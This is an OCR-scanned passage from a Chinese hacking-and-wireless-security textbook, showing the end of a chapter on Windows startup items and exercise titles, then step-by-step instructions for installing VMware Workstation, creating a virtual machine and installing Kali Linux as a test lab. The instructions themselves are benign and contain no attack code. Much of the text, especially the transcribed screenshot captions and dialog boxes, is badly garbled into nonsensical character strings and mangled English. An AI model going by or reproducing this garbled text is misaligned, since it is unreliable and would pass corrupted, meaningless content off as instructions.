名 称 发 而 状态 忆 册 
转 360 安 全 卫士 去 全 防护 中 心 。 360cn Be 二 高 
BBrindicator Brother Industries, Htd。 已 启用 中 
团 cTF 加 BB 闻 Micresoft Corporation ”已 启用 低 
三 Microsof OneDrive Micresoft Corporation ”已 启用 高 
国 Status Monitor Application Brother Industries, Ltd， 已 启用 中 

< > 


简 络 信息 (D) bn 


[Sep 国 选择 开机 启动 项 列表 框 中 需要 禁用 的 
启动 项 ， 单 击 “ 禁 用 ”按钮 ， 即 可 禁用 该 
启动 项 ， 如 下 图 所 示 。 
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局 - oO x 
文件 远大 (0) 查看 M) 
送 情 性能 “应 用 历史 记录 启动 用 户 详细 信息 服务 
Ea 发 者 状态 启动 而 
图 360 祥 全 卫士 去 全 防护 中 心 。 360.cn 已 启用 高 
BB Brndicator Brother Industries Ltd。 已 局 用 中 
避 cr mes Microsoft Corporation ”已 后 用 低 
@ Microsoft OneDrive Microsoft Corporation ”已 枯 用 高 
如 status Monitor Application Brother Industries, Ltd， 已 启用 中 
< > 
简略 信息 (D) 启用 (N) 


2.8 小 试 身手 


练习 1: 查询 IP 地 址 。 
练习 2: 查看 系统 开放 的 端口 。 
练习 3: 黑客 常用 攻击 命令 演练 。 
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第 3 重 


搭建 无 线 测试 系统 


Kali Linux 


无 线 技术 在 给 人 们 带 来 极 大 方便 的 同时 ， 也 带 来 了 极 大 的 信息 安全 风险 。 在 目前 ,无 
论 是 企 事业 单位 还 是 家 庭 用 户 ， 安 全 意识 依然 薄弱 。 本 章 介 绍 无 线 测试 系统 环境 的 搭建 ， 
主要 内 容 包 括 安装 与 创建 虚拟 机 、 安 装 与 更 新 Kali Linux 操 作 系 统 、 安 装 CDlinux 系 统 、 安 


装 与 使 用 靶 机 等 。 


3.1 安装 与 创建 虚拟 机 


对 于 无 线 安全 初学 者 ， 使 用 虚拟 机 构建 
无 线 测试 环境 是 一 个 非常 好 的 选择 ， 这 样 既 
可 以 快速 搭建 测试 环境 ， 同 时 还 可 以 快速 还 
原 之 前 快照 ， 避 免 错误 操作 造成 系统 衣 溃 。 


下 载 虚拟 机 软件 
虚拟 机 使 用 之 前 ， 需 要 从 官网 下 载 虚拟 
机 软件 vmware， 有 具体 的 操作 步骤 如 下 : 
Eeep 国 使 用 浏览 器 打开 虚拟 机 官方 网 站 
https://my.vmware.com/cn， 进 入 虚拟 机 官网 
页 面 ， 如 下 图 所 示 。 


晶 3.1.1 


my vmware 


四 这 里 需要 注册 一 个 账号 ，vmware 支 

持 中 文 页 面 ， 正 常 注册 即 可 ， 注 册 完 成 
后 ， 进 入 所 有 下 载 页 面 ， 并 切换 到 “所 有 
产品 ”选项 卡 ， 如 下 图 所 示 。 


所 有 下 载 


step 图 在 下 拉 页 面 找到 VMware Workstation 


Pro 对 应 选项 ， 单 击 右 侧 的 “查看 下 载 组 
件 ” 超 链接 ， 如 下 图 所 示 。 

ek | 
[step 图 进入 VMware 下 载 页 面 ， 在 其 中 选择 


Windows 版 本 ， 单 击 右 侧 “ 转 至 下 载 ” 超 链 
接 ， 如 下 图 所 示 。 


VMware Workstation Pro 


| 
YY VMware Workstadon Pro 1413for Windows 


| Y VMware Workstation Pro 14.13 for Linux 


nux 18-08-14 5T 款 


按钮 进行 下 载 ， 如 下 图 所 示 。 


由 中 和 序 和 I 具 。。” 开 当代 到 所 定义 15c 


This Workstation product installaton includes VMware | 
Tools for Windows 84-bit operating systems. 


3.1.2 ”安装 虚拟 机 软件 


虚拟 机 软件 下 载 完成 后 ， 接 下 来 
就 可 以 安装 虚拟 机 软件 了 ， 这 里 下 载 
的 是 目前 最 新 版 本 “VMware-worksta- 
tion-full-14.1.2-9474260.exe”， 用 户 可 根据 
实际 情况 选择 当前 最 新 版 本 下 载 即 可 ， 安 
装 虚拟 机 的 具体 操作 步骤 如 下 : 

[see 回 双 圭 下 载 的 VMware 安装 软件 ， 进 入 
“欢迎 使 用 VMware Workstation Pro” 窗 


口 ， 如 下 图 所 示 。 


着 vMware Workstation Pro 安装 一 x 
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WORKSTATION 


欢迎 使 用 VMware Workstation Pro 安装 向 导 


上 
4 


et de 
本 
主攻 


和 


a 
[sse 图 单 二 “下 一 步 ”按钮 ， 进 入 “最 终 用 
户 许可 协议 ”窗口 ， 选 中 < 我 接 收 许 可 协 
议 中 的 条 款 ” 复 选 框 ， 如 下 图 所 示 。 


期 VMware Workstation Pro 安装 一 x 
最 终 用 户 许可 协议 
请 仔 亲 次 以 下 许可 雹 议 * 
VMWARE 最 终 用 户 许可 协议 


请 注意 ， 在 本 软件 的 安装 过 程 中 无 论 可 能 会 出 现任 何 条 款 ， 
使 用 本 软件 都 将 受 此 最 终 用 户 许可 协议 各 条 款 的 约束 。 


请 仔细 阅读 ， 您 一 下 载 、 安 装 避 使 用 本 软件 ， 
您 《让 然 人 或 法 人 ) 妈 同 意 接受 本 最 终 用 户 许可 协议 (“ 本 
协议 ” ) 的 约束 。 如果 您 个 同意 本 协议 的 条 球 ， 请 义 卜 载 、 
安装 吉 使 用 本 软件 ， 您 必须 用 | 除 本 软件 ， 或 在 三 十 30) 天 


回 我 接 达 许可 协议 中 的 条 喜人 A) 


ee 


打 fpP) 


上 = 步 B) [FEM] 取消 
step 图 单 二 “下 一 步 ” 按 钮 ， 进 入 “ 自 定义 


安装 ”窗口 ， 在 其 中 可 以 更 改 安装 路 径 也 
可 以 保持 默认 ， 如 下 图 所 示 。 
期 VMware Workstation pro 安装 一 x 
Ra 辐 
es gonerel 机 


口 志 8 弄 键盘 如 动 程序 (每 要 重新 引导 以 使 用 此 功能 全 ) 
此 功能 要 求 主机 驱动 器 上 县 有 10MB 空间 * 


-$m [FE] | WW 


[Bp 单调 “下 一 步 ” 按 钮 ， 进 入 “用 户 体 
验 设置 ”窗口 ， 这 里 采用 系统 默认 设置 ， 
如 右上 图 所 示 。 
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涯 VMware Workstation Pro 去 靳 一 X 


用 户 体验 设置 回 


编辑 默认 设置 以 提高 全 的 用 户 体验 。 


回 启 :加 检查 产品 更 新 (C) 
ee Workstation Pro 启动 时 ， 检 查 应 用 程序 和 已 安装 软件 组 件 是 否 有 


回 加 入 VMware 客户 体验 改进 计划 O) 
|vMware 客户 体验 提升 计划 (CEIP) 将 向 VMware 提供 相 人 
关 信 息 ， 以 帮助 VMware 改进 产品 和 服务 、 解 决 问 
题 、 并 向 您 建议 如 何以 最 佳 方式 部 署 和 使 用 我 们 的 产 
品 - 作为 CEIP 的 一 部 分 ，VMware 会 定期 收集 和 您 所 
持 有 的 VMware 密 钥 相关 的 使 用 VMware 产品 和 服务 的 v 
了 字 更 条 信息 


下 | [下 -500] [| 


单 击 “ 下 一 步 ” 按 钮 ， 进 入 “快捷 
方式 ”窗口 ， 在 其 中 可 以 创建 用 户 快捷 
方式 ， 这 里 可 以 保持 默认 设置 ， 如 下 图 
所 示 。 


期 VMware Workstation Pro 去 凌 二 x 


EE 加 | 


选择 您 要 小 入 系统 的 快捷 方式 。 


在 以 下 位 置 创建 wware Workstaton Pro 的 快 毛 方式 : 
回 桌 面 D) 
回 开 始 菜单 程序 文件 夹 (5) 


Ey [FB] | 


单 击 “ 下 一 步 ” 按 钮 ， 进 入 “已 准备 
好 安装 VMware workstation Pro” 页 面 ， 
始 准备 安装 虚拟 机 软件 ， 如 下 图 所 示 。 


期 VMware Workstation Pro 云 装 一 x 


En 单 击 上 一 步 查看 或 更 约 任 何 安装 设置 。 单 击 ' 取 消 记 出 向 


已 准备 好 安装 VMware Workstation pro 


EB Li 
step 国 单 二 “安装 ”按钮 ， 等 待 一 段 时 间 后 
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虚拟 机 便 可 以 安装 完成 ， 并 进入 “VMware 
workstation Pro 安 装 向 导 已 完成 ”窗口 ， 单 
击 “ 完 成 ”按钮 ， 关 闭 虚 拟 机 安装 向 导 ， 
如 下 图 所 示 。 


| 淹 VMware Workstation Pro 安 魏 


VMware Workstation Pro 安装 向 导 已 完成 


WORKSTATION 单 击 " 完 成 按钮 退出 去 装 向 导 » 


区 ei WT A 
ia CD] 
step 图 在 安装 完成 页 面 中 ， 单 击 “ 许 可 证 ” 


按钮 ， 跳 转 至 “输入 许可 证 密 钥 ”页 面 ， 在 
其 中 可 以 输入 许可 证 密 钥 ， 如 下 图 所 示 。 


睛 VMware Workstation pro 去 法 


输入 许可 证 密 钥 
此 对 活 相 可 保存 产品 许可 证 记得 


许可 证 密 负 属 式 : wooc-woooc3o000t 0000 0000 


和 人 知 失 拯 友 让 茵 六 ， 庆 才学 语 阴 站 种 丰 交 恕 启 它 ， 后 并 多 入 ， 


mis | CAG] 


虚拟 机 安装 完成 后 ， 重 新 启动 系统 
后 ， 才 可 以 使 用 虚拟 机 ， 至 此 ， 便 完成 了 
wmware 虚 拟 机 的 下 载 与 安装 ， 如 下 图 所 示 。 


币 VMware Workstation Pro 安 站 
; ,对 Wvere Wolstaton 
[iy i 
记者 


CE 


Ev 


昌 3.1.3 ”创建 虚拟 机 系统 


E 安装 完 虚拟 机 以 后 ， 就 需要 创建 一 
台 真 正 的 虚拟 机 ， 为 后 续 的 测试 系统 做 准 
备 。 创 建 虚拟 机 的 具体 操作 步骤 如 下 : 
[step 图 双 去 桌面 安装 好 的 VMware 虚拟 机 图 
标 ， 打 开 VMware 虚 拟 机 软件 ， 如 下 图 所 示 。 
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es 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


C= 
Eu ap Stm San 
Qi 


WORKSTATION 14 


+ 加 | 


Es 


单 击 “ 创 建新 的 虚拟 机 ”按钮 ， 进 入 
“新 建 虚拟 机 向 导 ” 对 话 框 ， 在 其 中 选择 
“ 自 定义 ” 单 选 按钮 ， 如 下 图 所 示 。 


NS 


欢迎 使 用 新 建 虑 拟 机 问 导 


永 希 望 使 用 什么 类 型 和 笨 注 > 


口 奥 型 (推荐 IT) 
通过 几 个 简单 的 步 强 他 建 Workstation 14.x 
庶 执 机。 


回 自 定 火 (而 吉 )(C) 


到 建 沉 有 SC5[ 控制 器 类 型 ， 座 拱 红 台 天 卉 
Na VMware 产品 兼 在 性 竹 融 级 过 项 


ED] < + 上 (BW) 


EGG 图 单 二 “下 一 步 ”按钮 ， 进 入 “选择 虚 
拟 机 硬件 兼容 性 ”对 话 框 ， 在 其 中 设置 虚 
拟 机 的 硬件 兼容 性 ， 这 里 采用 默认 设置 ， 
如 下 图 所 示 。 


职 消 


Fn x 
迁 笃 点 反 机 更 件 兼 容 性 
该 诺 所 机 要 要 问 种 鹿 件 功能 ? 
机 本 件 关 奉 性 
王 件 妆 窜 性 (H): Woreetation 14 v 
基 容 : ESX Sever(S) 
和 限制: 
ESXI6.7 64 68 内 存 
Fusen 10x 15 个 处 理 吕 
Wiorkstation 14. 10 个 了 网络 庆 
| 9 TB 碰 盘 大 小 
EL] < 上 —(B) 取消 


[Eee 加 单 去 “下 一 步 ” 按 钮 ， 进 入 “安装 客 
户 机 操作 系统 ”对 话 框 ， 在 其 中 选择 “ 稍 后 
安装 操作 系统 ” 单 选 按钮 ， 如 下 图 所 示 。 


EE 


安装 育 户 所 所作 系统 
主 极 机 如 局 和 至 机 ， 委 要 昌 作 条 综 。 多 村 如 问 雪 半 宫 户 机 拱 作 > 


六 


去 得 B 光 全 1 
向 8 夫 雪 


口 宁 各 友 兴 组 扫 像 区 件 (soJ0M): 
EsaiduNetdekDownlbad 


加 和 后 装 直 作 系统 (5)。 
人 用 庶 术 机 片 包含 一 个 全 日 庆生 。 


ED < 上 (8) [F-S0W)> [2 


Eee 图 单 去 “下 一 步 ” 按 钮 ， 进 入 “选择 客 
户 机 操作 系统 ”对 话 框 ， 在 其 中 选择 Linux 
单 选 按钮 ， 如 下 图 所 示 。 

新 建 虚 涪 机 向 号 六 | 


选择 窒 户 机 操作 系统 
此 上 要 机 中 彼 于 邑 种 模 作 天 统 ? 


窜 户 机 手 作 不过 


OMicrosofe Vndows(W) 
图 unedb 

Onovel NerwaretE) 
Osobrs(s) 

vam ESX 
OMW(O) 


上 本 (V) 
Ubunty 


ED < 上-#(6) [FS0W)> [2 


[step 图 单 去“ 版 本 ”下 拉 按 钮 ， 在 弹出 的 下 
拉 列 表 中 选择 “其 他 Linux 4.x 或 更 高 版 本 
内 核 64” 版 本 系统 ， 这 里 的 系统 版 本 与 主 
机 系统 版 本 无 关 ， 可 以 自由 选择 ， 如 下 图 
所 示 。 


Red Hat Enterpise Lnux 4 64 位 ~ 
Red Hat Enterprise Linux 4 

Red Hat Enterprise Linux 3 64 位 
Red Hat Enterpise Lnux 了 

Red Hat Enterpiise Lnux 2 

Red Hat Lnux 

Sun Java Desktop System 

SUSE Lnux Entarpree 12 64 这 
SUSE Lnux Entarprge 11 64 位 
SUSE Lnux Enterprise 11 

SUSE Lnux Enterprise 10 64 广 
SUSE Lnux Enterprse 10 

SUSE Lnux Enterprise 7/8/9 64 位 
SUSE Lnux Enterprise 7/8/9 
SUSE Lnux 54 位 

SUSE Lnux 

Turbolnux 64 位 

Turboinux 

Ubuntu 64 位 

Ubuntu 

VMware photon os 64 这 


其 他 Linux 4.x 或 重 高 版 本 内 核 

和 Unux 3 内核 寻 位 

其 他 Linux 3.x 内 核 

其 他 Linux2.5.x 肉 校 64 位 

其 他 Unux 2.5. 内核 

其 他 Unux 2.4 内 核 64 位 

其 他 Linux 2.4.x 内 以 

其 他 Linux22x ~ 


| 其 他 Unux 4x 或 里 襄 版 本 向 校 本 位 3 
[step 国 单 直 “ 下 一 步 ” 按 钮 ， 进 入 “命名 虚 
拟 机 ”对 话 框 ， 在 “虚拟 机 名 称 ” 文 本 框 
中 输入 虚拟 机 名 称 ， 在 “位 置 ” 中 选择 一 
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个 存放 虚拟 机 的 磁盘 位 置 ， 如 下 图 所 示 。 


FE x 


靖 名 谋反 机 
您 名 望 该 谨 拟 机 德 用 什么 名 称 ? 


ee 
Vea Mchnesa ini 
在 编辑 "> 首选 而 中 可 更 纱 职 认 位 置 。 


| | b(n). 


< 上 —#(6) 阳 消 


[step 图 单 去 “下 一 步 ” 按 钮 ， 进 入 “处 理 器 
配置 ”对 话 框 ， 在 其 中 选择 处 理 器 数量 ， 
一 般 普 通 计算 机 都 是 单 处 理 ， 所 以 这 里 不 
用 设置 ， 处 理 器 内 核 数 量 可 以 根据 实际 处 
理 器 内 核 数 量 设置 ， 如 下 图 所 示 。 


新 于 虚拟 1 向 导 x 


处 香 天 除 于 
为 比 谎 执 机 指定 处 理 器 才 禾 。 
外 时 党 
烛 理 器 却 量 (?); 1 ~ 
每 个 处 理 吕 的 内 核 政 旱 (C): 
内 核 名 数 : 


ED < 上 —#(B) 取消 


单 击 “ 下 一 步 ” 按 钮 ， 进 入 “此 虚拟 
机 的 内 存 ” 对 话 框 ， 根 据 实 际 主 机 进行 设 
置 ， 最 少 内 存 不 能 低 于 768MB， 这 里 选择 
4096MB 也 就 是 4G 内 存 ， 如 下 图 所 示 。 


i x 
此 庶 沁 机 的 内 存 
您 要 为 此 出 K 机 使 用 多 少 内 存 ? 
指定 分 上皮 此 庆 i 的 内 有 里。 内存 大 小 必须 为 4 HB B38 数 。 
uk 此 埋 尖 机 的 内 存 (M): 09d 3 MB 
2% 一 一 一 
is 
3 a 3 县 大 推 逢 内存: 
pe 5268 
Re 司 扒 3 内 存 : 
3256 上 768 ME 
2o 
pe 了 富 户 机 要 作 不 六 最 低 准 适 内 : 
mm 4 22M 
swe 
sme 
ae 
E23 < 上-(B) 取消 
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钮 ， 如 下 图 所 示 。 


SEE 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


Estee 加 单 去 “下 一 步 ” 按 钮 ， 进 入 “网 络 类 
型 ”对 话 框 ， 这 里 选择 “使 用 网 络 地 址 转 
换 NAT” 单 选 按钮 ， 如 下 图 所 示 。 


新 建 上 所 负 向 导 

网 络 类 型 

要 本 加 也 类 况 络 7 

网 络 连接 
口 使 用 入 接 网 络 (R) 

3 汪汪 的 失语 的 1 承 * 训 让 外 3 拓 上 必须 
加 使 用 网 绪 地 址 转换 (NAT}(E) 

lio 卫 地 址 访问 主机 找 号 连接 或 外 部 以 太 网 3 络 连 接 的 


口 使 用 候 主 机 模式 况 结 () 
将 客户 机 操作 系统 和 连接 到 主机 上 的 专用 虚 扑 隐 络 * 


口 不 使 用 网 络 连接 (T) 


| 必 助 


< 上 —$(8) 型 消 


[Es 图 单 击 “ 下 一 步 ” 按 钮 ， 进 入 “选择 
磁盘 ”对 话 框 ， 这 里 选择 “创建 新 虚拟 磁 
盘 ” 单 选 按钮 ， 如 下 图 所 示 。 


丢 至 三 盘 
总 要 全 用 站 访 息 ? 


C3 

6 时 夺 一 (V) 
人 

单个 硬盘 。 虚拟 谤 和 可 在 一 自主 机 上 或 多 台 主机 之 间 轻 松 昌 制 或 移 2h。 

口 他 用 现 有 睾 拟态 盘 (E) 
选 汉 此 进项 可 重 产 使 用 以 前 醒 畦 的 谤 条 

口 使 用 初 弄 让 盘 (适用 于 高 级 用 户 JIP) 
选 和 此 读 硕 5 为 诬 拉 机 提 代 直接 访问 本 地 三 和 的 权限 。 舌 要 县 有 管 哩 员 特 机 。 


< 上 —#(8) be 


Eee 加 单 去 “下 一 步 ” 按 钮 ， 进 入 “选择 JI/ 
O 控 制 器 类 型 ”对 话 框 ， 这 里 选择 LSI Logic 
单 选 按钮 ， 如 下 图 所 示 。 


新 建 虚拟 只 向 导 x 
选择 1/O 控制 器 类 型 
您 要 使 用 何 种 类型 9 SCSI 控制 器 ? 
J10 控制 器 类 型 
5C5I 控制 器 : 
BusLogle(U) “(不 适用 于 54 位 客户 机 ) 
@LsILogclL) (推荐 ) 


OSILogic SAS(S) 


部 且 < 上 一步 (B) 取 肖 


单 击 “ 下 一 步 ” 按 钮 ， 进 入 “选择 
磁盘 类 型 ”对 话 框 ， 这 里 选择 SCSI 单 选 按 


[se 加 单 二 “下 一 步 ” 按 钮 ， 进 入 “指定 磁 
盘 容 量 ” 对 话 框 ， 这 里 磁盘 大 小 设置 40GB 

空间 即 可 ， 选 择 “ 将 虚拟 盘 拆 分 成 多 个 文 
件 ” 单 选 按钮 ， 如 下 图 所 示 。 


FS 
代 室 丰 盘 吝 里 
请 统 大 小 为 多 少 ? 
最 大 喇 维 大 外 (GB)(S): 种 语 
针对 其 他 Lnue 4x 歌 更 训 有 本 内 覆 64 位 的 建议 大 小: 8 G8 


口 立 同 分 可 所有 隋 盘 空间 (A)> 
2 伺 要 求 所 有 掀 更 流 盘 空间 立即 可 用 。 全 有 
空 司 ， 卉 其 条 的 空间 最 术 很 小 ， 会 捕 着 售 句 址 中 沃 加 末 据 而 不 断 挛 : 

口 区 计 Hii 全 存放 单个 文件 (0) 

网 将 由 H 而 各 拆 分 成 条 个 文件 (N) 
Ww 本 以 更 径 检 地 在 计算 机 之 间 穆 动 虚拟 机 ， 但 可 能 会 降低 大 容量 硬 卉 的 性 


<£—#(8) [TF-#(W) > 了 消 


单 击 “下 一 步 ”按钮 ， 进 入 “指定 磁 
盘 文 件 ” 对 话 框 ， 


这 里 保持 默认 即 可 ， 如 


下 图 所 示 。 
导 Es 
新 建 虚拟 册 向 ， Rn 
适 择 和 类 型 
您 要 创建 何 种 磁盘 ? 指定 七 胡 文件 
总 要 在 何 处 存 凡 磋 盘 文件 7 

大 i 
ss 将 使 用 多 个 大 铭 文件 创建 一 个 40 63 证 瓜 磋 盘 。 将 根据 此 文件 名 自动 命名 这 些 详 盘 文 
图 SCSIS) (推荐 ) 件 。 
CN. Fer mad EO 
ONVMe(V) 

才 且 < 上 —$(8) 于 清 者 二 < £—(B} 取消 


[图 单 贞 “下 一 步 ”按钮 ， 进 入 “已 准备 
好 创建 虚拟 机 ”对 话 框 ， 如 下 图 所 示 。 


新 于 帮 淮 机 向 号 x| 


已 准备 好 创建 诺 所 机 
了 直 K.。 多 后 J 以 安 法 基 他 Unuy 4 高 六 6 


从 使 用 下 列 设置 创 时 虚拟 机 : 


吉本 内 核 寻 位 


硬盘 40 68, 拆 分 

闪存: 4096 NB 

网 络 适配器 NAT 

+ 个 CPU 内 检 , CD/DVD, USB 控制 尖 , 打 ED 机 , 再 卡 


自 定 愉 硬件 (C)… 


< 上 —(8) 取消 


[step 贺 单 去 “完成 ”按钮 ， 至 此 ， 便 创建 了 
一 个 新 的 虚拟 机 ， 如 下 图 所 示 。 这 一 步 相 
当 于 组 装 了 一 台 裸 机 计算 机 ， 这 当中 的 硬 
件 设 配 ， 可 以 根据 实际 需求 再 进行 更 改 。 


ET 
| 


3.2 ”安装 与 更 新 Kali Linux 操 


作 系 统 


现实 中 组 装 好 计算 机 以 后 需要 给 它 安装 
一 个 系统 ， 这 样 计算 机 才 可 以 正常 工作 ， 虚 
拟 机 也 一 样 ， 同 样 需要 安装 一 个 操作 系统 ， 
本 节 介 绍 如 何 安装 Kali Linux 操 作 系统 。 


3.2.1 下 载 Kali Linux 系 统 


Kali Linux 是 基于 Debian 的 Linux 发 行 
版 ， 设 计 用 于 数字 取证 操作 系统 。 由 Offen- 
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sive Security Ltd 维 护 和 资助 。 最 先 由 Offen- 
sive Security 的 Mati Aharoni 和 Devon Keams 
通过 重 写 BackTrack 来 完成 ，BackTrack 是 他 
们 之 前 写 的 用 于 取证 的 Linux 发 行 版 。 

下 载 Kali Linux 系 统 的 具体 操作 步骤 
如 下 : 
[step 图 在 浏览 器 中 输入 Kali Linux 系 统 的 网 
址 : https: //www.kali.org， 按 Enter 键 打开 
Kali 官 方 网 站 ， 如 下 图 所 示 。 


KALI 


Our Most Advanced Penetration Testing Distribution, Ever. 
t Kall Linux News and Tutorlals 


OE | 


单 击 Downloads 菜 单 ， 在 弹出 的 菜单 
列表 中 选择 Download Kail Linux 选 项 ， 如 下 
图 所 示 。 

Downloads Trainin8 

Kali Linux NetHunter 

Kali Linux Revealed Book 

Release Information 
step 图 Kaili 提 供 了 各 种 版 本 的 系统 下 载 ， 用 
户 可 以 通过 HTTP 或 者 Torrent 两 种 方式 进行 
下 载 ， 如 下 图 所 示 。 用 户 可 根据 实际 情况 
选择 下 载 相应 的 版 本 ， 这 里 选择 最 上 面 一 项 
“Kali Linux 64 Bit” 进 行 下 载 。 
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SEE 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


[Step 加 Kali 官 方 还 提供 了 快速 装机 方式 Be i 
wmware 镜 像 下 载 ， 这 个 列表 不 但 提供 了 ne 
wmware 虚 拟 机 镜像 ， 还 提供 了 vobx 虐 拟 镜 ima De Cam 
像 ， 如 下 图 所 示 。 

本 

生生 

a | 
( 侈 提示 : 初学 者 建议 先 手动 安装 Kali Linux Er 
系统 以 后 全 用 笋 琳 后 可 以 选 舌 凑 所 机 统 | 5 国 | 单 二 “打开 * 浪 家 六 曾 到 大 要 六 
像 安装 。 


设置 界面 ， 这 里 单 击 “ 开 启 此 虚拟 机 ” 选 
项 ， 便 可 以 启动 虚拟 机 ， 如 下 图 所 示 。 


得 3.2.2 ”安装 Kali Linux 系 统 
架设 好 虚拟 机 并 下 载 好 Kali Linux 系 统 


后 ， 接 下 来 便 可 以 安装 Kali Linux 系 统 了 。 ‘0 
安装 Kali 操 作 系 统 的 具体 操作 步骤 如 下 : i 
[step 加 打开 安装 好 的 虚拟 机 ， 单 二 CD/DVD OR amen 
选项 ， 如 下 图 所 示 。 us 


nn i _| EGG 图 启动 虚拟 机 后 会 进入 到 启动 选项 界 
面 ， 用 户 可 以 通过 键盘 上 下 键 选择 Graphical 
install 选 项 ， 如 下 图 所 示 。 


istall 
Graphical install 


选择 完毕 后 ， 按 Enter 键 ， 进 入 语言 选 


Ss Sr 这 里 选择 “简体 中 文 ”选项 ， 如 
下 图 所 示 。 


step 图 在 打开 的 “连接 ”界面 中 选择 “使 用 
ISO 映像 文件 ” 单 选 按钮 ， 如 下 图 所 示 。 
连接 
中 使 用 物理 驱动 器 (P): 

启动 检测 
@ 使 用 150 映像 文件 (M): 

[Di\BaduNetdskDownload\c ~ 


pone be eed por the metaltation procnes. To eelectod anguage wil al be the 
Fa language for the Inetalled sys 
rye: 


高 级 (V)..… 
en 单 击 “ 浏 览 ” 按 钮 ， 打 开 “ 浏 览 ISO 


影像 ”对 话 框 ， 在 其 中 选择 下 载 好 的 系统 
映像 文件 ， 如 右上 图 所 示 。 
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step 园 单 去 Continue 按 钮 ， 进 入 选择 语言 
确认 界面 ， 保 持 系统 默认 设置 ， 如 下 图 
所 示 。 


Seloct alanguage 


机 的 要 本本 二天 二- 


和 有 
中 ， 者， 名 时 不 可用， 

9 

- 

名 


单 击 “继续 ”按钮 ， 进 入 “请 选择 您 
的 区 域 ”界面 ， 它 会 自动 上 网 匹配 。 即 使 不 
正确 也 没有 关系 ， 系 统 安装 完成 后 还 可 以 调 
整 ， 这 里 保持 默认 设置 ， 如 下 图 所 示 。 


卫生 志 六 半 了 届 和 和风 站 区 以 从 只 全 关外 村， 加重 人 的 
术科 杀 和 和 和 和 人生， 中， 


ET 站 mm | 
上 单 击 “ 继 续 ” 按 钮 ， 进 入 “请 选择 键 
py 界面 ， 同 样 系统 会 根据 语言 选择 
来 自行 匹配 ， 这 里 保持 默认 设置 ， 如 下 图 
所 示 。 


了 
NEE (DS FR) 


| aaxzaz 


step 轿 单 击 “继续 ”按钮 ， 进 入 “配置 网 
络 ” 界 面 ， 这 里 需要 输入 一 个 主机 名 称 ， 
如 输入 Kali， 如 右上 图 所 示 。 
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ES 
seesansap- nen weenassneae 本 sreuAune, smeest 
ne 

区 ] 


ET wm |[ wm | 


step 团 单 击 “继续 ”按钮 ， 进 入 “配置 网 
络 ” 界 面 ， 这 里 可 以 输入 一 个 域名 ， 也 可 
以 设置 域名 为 空 ， 如 下 图 所 示 。 


ag Te ME AARY ,com net ‘du 本 -org 人 下 
Tre 
5 


[ ] 


aa | [ED 


wm] 


[step 图 按 Enter 键 ， 进 入 “Root 用 户 密 码 ” 界 
面 ， 这 里 可 以 设置 两 个 相同 的 密码 ， 如 下 
图 所 示 。 

| Root 用 户 赦 码 


口 且 示 明文 密码 


| 为 了 保证 您 的 密码 正确 无 误 ， 请 再 次 输入 相同 的 root 密码 . 
请 再 次 兽人 画 三 以 验证 基 正确 星 : 


I6 里 示 明 文 密码 
按 Enter 键 ， 进 入 磁盘 划分 界面 ， 新 手 
建议 不 划分 也 就 是 选择 “使 用 整个 磁盘 ” 
选项 ， 如 下 图 所 示 。 


[ss - 使 用 如 个 王公 
向 导 - 使 用 整个 磁盘 并 配置 LVM 
向 导 - 使 用 整个 磁盘 并 配置 加 密 的 LVM 
| 手动 


step 贺 按 Enter 键 ， 进 入 选择 分 区 磁盘 界面 ， 
这 里 可 以 保持 默认 设置 ， 如 下 图 所 示 。 


注意 ,所 选 磁盘 上 的 全 部 数据 邦和 将 被 制 除 ， 但 是 您 还 是 有 确认 是 否 真 的 要 这 么 做 的 机 会 。 
请 进 拌 要 分 区 的 磁盘 : 


SCSI1 (0,0,0) (sda) - 42.9 GB VMware, VMware Virtual S 


step 图 按 Enter 键 ， 进 入 文件 分 区 界面 ， 这 里 
Fy 如 下 图 所 示 。 
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SEE 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


| 选 定 要 分 区 : 
SCSI]l (0,0,0) (sda) - VMware, VMware Virtual S: 42.9 GB 


该 磁盘 可 以 使 用 以 下 数 种 不 同方 式 来 进行 分 区 。 如 果 您 不 确定 ， 请 选择 第 一 个 。 
分 区 方案 : 


特 所 有 文件 放 在 同一 个 分 区 中 (推荐 新 手 使 用 ) 


将 /home 放 在 单独 的 分 区 
将 /home、/var 和 上 tmp 都 分 别 放 在 单独 的 分 区 


step 国 按 Enter 键 ， 
图 所 示 。 


同业 主 放大 靖 间 下放 
个 六 和 风光 


进入 分 区 确认 界面 ， 如 下 


PTT TT rr 


per 
RuD 
ET 
ue 

em iscsie 


SCSH (0.0,0) (sda) -42.9 68 VMware, VMware Vitual S 
> 
> 


{wp sap 


[Step 可 按 Enter 键 ， 进 入 格式 化 分 区 界面 ， 选 
择 “ 是 ” 单 选 按钮 ， 如 下 图 所 示 。 


如 果 您 杷 寺 ， 以 下 所 列 出 的 修改 内 容 将 会 写 入 到 磁盘 中 。 或 者 ， 您 也 可 以 手动 来 进行 其 它 修改 。 


以 下 设备 的 分 区 表 已 改变 
SCSI1 (0,0,0) (sda) 


以 下 分 区 将 被 格式 化 


SCSI1 (0,0,0) (sda) 设备 上 的 第 1 分 区 将 设 为 ext4 
SCSI1 (0,0,0) (sda) 设备 上 的 第 5 分 区 将 设 为 swap 


将 改动 写 人 三 盆 昌 了 
百 
加 站 


按 Enter 键 ， 进 入 配置 软件 包 管 理 器 界 
面 ， 这 里 保持 默认 设置 ， 如 下 图 所 示 。 
网 络 镜 像 可 以 用 来 补充 光盘 所 带 的 软件 ， 也 可 以 用 来 提供 较 新 版 本 的 软件 。 
合用 网 格拉 各 19 ? 


I 
回 是 


step 图 按 Enter 键 ， 进 入 是 否 使 用 代理 上 网 界 
面 ， 设 置 保持 默认 设置 ， 如 下 图 所 示 。 
各 果 您 需要 用 HTTP 代理 来 连接 外 部 网 络 ， 请 在 此 输入 代理 信息 。 否 则 ,请 于 空 . 


代理 信息 应 按照 “http://[[ 用 户 名 ][: 密 码 ]@] 主 机 名 [: 端 口 ]/” 的 标准 格式 给 出 - 
HTTP 代理 信息 (如 黑 没 有 请 贸 安 


step 图 按 Enter 键 ， 进 入 将 GRUB 安 装 至 硬盘 
界面 ， 保 持 默认 设置 ， 如 右上 图 所 示 。 
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EY 


和 失 末 六 妥 关 打下 二 特 基 这 厨 计 丰 大 惟一 纪检 作 不 十， 妇 时 多 请 训 此 ,合流 可 以 安全 将 GRUB 后 引导 时长 到 要 一生 人 的 
ae 上 


